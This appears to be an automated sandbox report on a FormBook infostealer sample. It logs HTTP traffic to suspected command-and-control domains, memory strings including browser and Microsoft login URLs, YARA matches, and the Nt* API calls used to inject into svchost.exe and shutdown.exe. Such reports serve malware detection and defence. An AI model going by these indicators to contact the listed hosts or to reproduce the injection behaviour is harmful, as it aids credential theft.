Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:16:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Fri, 10 Jan 2025 17:16:30 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gvg9RqHCJDKe0opXcfUmJIfhUoHR5AVtoPJb8STI7P2EDBeZx1Aw5NcZGNotnLDCdDfDDIcyBrK2eh6Ugtie5LOmdAVFyNHGyK245NM3dARmVrU3NAtMSwny9qyfreeL1mXR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe50b48a18c472-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=741&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 38 13 b7 a0 91 a7 Data Ascii: 51eWo6X\|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:16:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Fri, 10 Jan 2025 17:16:33 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gEXwcfIUVhkzWw4ZWfJ6N8bM9%2B%2F8iVd5KBqBwQVXvKbV7rxKtNJgbodiya0%2BnapAEjrwZ4YCH43o08VVJm0CK1sfF%2FWKQg3enmitjvuKPUv4ANgzbbKKGCPd2JzPQh7bC93b"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe50c46b8b72b6-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1969&rtt_var=984&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 Data Ascii: 51eWo6X\|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:16:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Fri, 10 Jan 2025 17:16:36 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZjXFDcGMehproxb1TFCnnOeNpZb4NF%2F4xlpsirftByaNJHH0SLKYtmzdBo8RdILo%2B5xi7CDbBKqqCA5pBbdxppjCitf8S1fbItRdrRIBUmCN2pEtNa%2Ferk9nnED5352%2BJfBk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe50d47d0d7cff-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2004&rtt_var=1002&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1778&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c Data Ascii: 512Wo6X\|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L

Source: shutdown.exe, 00000004.00000002.3784032812.0000000004C72000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.0000000004C02000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cifasnc.info/9kxb/?SDC=3P5Gm1XciD5wQdS
Source: shutdown.exe, 00000004.00000002.3784032812.0000000004C72000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.0000000004C02000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cifasnc.info/xmlrpc.php
Source: krQctklhjIp.exe, 00000006.00000002.3783560766.00000000045BA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://maximumgroup.co.za/e9xq/?SDC=vLV1J
Source: krQctklhjIp.exe, 00000006.00000002.3785615041.0000000005525000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.cifasnc.info
Source: krQctklhjIp.exe, 00000006.00000002.3785615041.0000000005525000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.cifasnc.info/9kxb/
Source: shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: shutdown.exe, 00000004.00000002.3781063208.000000000268E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=000000004
Source: shutdown.exe, 00000004.00000002.3781063208.000000000265A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: shutdown.exe, 00000004.00000002.3781063208.000000000268E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C=x
Source: shutdown.exe, 00000004.00000002.3781063208.000000000268E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: shutdown.exe, 00000004.00000002.3781063208.000000000268E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: shutdown.exe, 00000004.00000002.3781063208.000000000268E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2RR
Source: shutdown.exe, 00000004.00000002.3781063208.000000000265A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: shutdown.exe, 00000004.00000002.3781063208.000000000265A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: shutdown.exe, 00000004.00000002.3781063208.000000000268E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5
Source: shutdown.exe, 00000004.00000002.3781063208.000000000268E000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3781063208.000000000265A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: shutdown.exe, 00000004.00000002.3781063208.000000000268E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: shutdown.exe, 00000004.00000003.1676331986.00000000075B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: shutdown.exe, 00000004.00000002.3784032812.0000000004AE0000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.0000000004A70000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.erexolsk.shop/e69q/?SDC=Ihe54J8FxOdLpDLvAVmEpnE90Z1v01c1zwkBMMYSe/
Source: shutdown.exe, 00000004.00000002.3784032812.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.0000000003ABC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.furrcali.xyz/3q0n/?mH=CpePy0P&SDC=Tjpuhg9Hdb5c5HB9jPgNQOvIuWVFM511nCRzgFR6HJlcxpLdGBzI/s
Source: shutdown.exe, 00000004.00000002.3784032812.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.0000000003ABC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.furrcali.xyz/3q0n/?mH=CpePy0P&SDC=Tjpuhg9Hdb5c5HB9jPgNQOvIuWVFM511nCRzgFR6HJlcxpLdGB
Source: shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004DEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_004DEAFF

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004DED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_004DED6A

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

0_2_004DEAFF

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004CAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_004CAA57

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004F9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_004F9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1482212976.0000000000EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1481529737.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3783203591.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3783026458.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3777177232.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1483094484.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3783040936.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: KcSzB2IpP5.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: KcSzB2IpP5.exe, 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f61a9afd-1
Source: KcSzB2IpP5.exe, 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_67157844-3
Source: KcSzB2IpP5.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6f22d05a-a
Source: KcSzB2IpP5.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c9abac54-1

Uses shutdown.exe to shutdown or reboot the system

Source: C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C8C3 NtClose,	2_2_0042C8C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B60 NtClose,LdrInitializeThunk,	2_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03272DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03272C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,	2_2_032735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274340 NtSetContextThread,	2_2_03274340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274650 NtSuspendThread,	2_2_03274650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BA0 NtEnumerateValueKey,	2_2_03272BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B80 NtQueryInformationFile,	2_2_03272B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BE0 NtQueryValueKey,	2_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BF0 NtAllocateVirtualMemory,	2_2_03272BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AB0 NtWaitForSingleObject,	2_2_03272AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AF0 NtWriteFile,	2_2_03272AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AD0 NtReadFile,	2_2_03272AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F30 NtCreateSection,	2_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F60 NtCreateProcessEx,	2_2_03272F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FA0 NtQuerySection,	2_2_03272FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FB0 NtResumeThread,	2_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F90 NtProtectVirtualMemory,	2_2_03272F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FE0 NtCreateFile,	2_2_03272FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E30 NtWriteVirtualMemory,	2_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EA0 NtAdjustPrivilegesToken,	2_2_03272EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E80 NtReadVirtualMemory,	2_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EE0 NtQueueApcThread,	2_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D30 NtUnmapViewOfSection,	2_2_03272D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D00 NtSetInformationFile,	2_2_03272D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D10 NtMapViewOfSection,	2_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DB0 NtEnumerateKey,	2_2_03272DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DD0 NtDelayExecution,	2_2_03272DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C00 NtQueryInformationProcess,	2_2_03272C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C60 NtCreateKey,	2_2_03272C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CA0 NtQueryInformationToken,	2_2_03272CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CF0 NtOpenProcess,	2_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CC0 NtQueryVirtualMemory,	2_2_03272CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273010 NtOpenDirectoryObject,	2_2_03273010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273090 NtSetValueKey,	2_2_03273090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032739B0 NtGetContextThread,	2_2_032739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D10 NtOpenProcessToken,	2_2_03273D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D70 NtOpenThread,	2_2_03273D70
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B44340 NtSetContextThread,LdrInitializeThunk,	4_2_02B44340
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B44650 NtSuspendThread,LdrInitializeThunk,	4_2_02B44650
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42AF0 NtWriteFile,LdrInitializeThunk,	4_2_02B42AF0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42AD0 NtReadFile,LdrInitializeThunk,	4_2_02B42AD0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_02B42BA0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_02B42BF0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_02B42BE0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42B60 NtClose,LdrInitializeThunk,	4_2_02B42B60
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_02B42E80
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_02B42EE0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42FB0 NtResumeThread,LdrInitializeThunk,	4_2_02B42FB0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42FE0 NtCreateFile,LdrInitializeThunk,	4_2_02B42FE0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42F30 NtCreateSection,LdrInitializeThunk,	4_2_02B42F30
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_02B42CA0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_02B42C70
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42C60 NtCreateKey,LdrInitializeThunk,	4_2_02B42C60
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_02B42DF0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42DD0 NtDelayExecution,LdrInitializeThunk,	4_2_02B42DD0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_02B42D30
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_02B42D10
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B435C0 NtCreateMutant,LdrInitializeThunk,	4_2_02B435C0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B439B0 NtGetContextThread,LdrInitializeThunk,	4_2_02B439B0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42AB0 NtWaitForSingleObject,	4_2_02B42AB0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42B80 NtQueryInformationFile,	4_2_02B42B80
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42EA0 NtAdjustPrivilegesToken,	4_2_02B42EA0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42E30 NtWriteVirtualMemory,	4_2_02B42E30
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42FA0 NtQuerySection,	4_2_02B42FA0
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_02B42F90 NtProtectVirtualMemory,	4_2_02B42F90
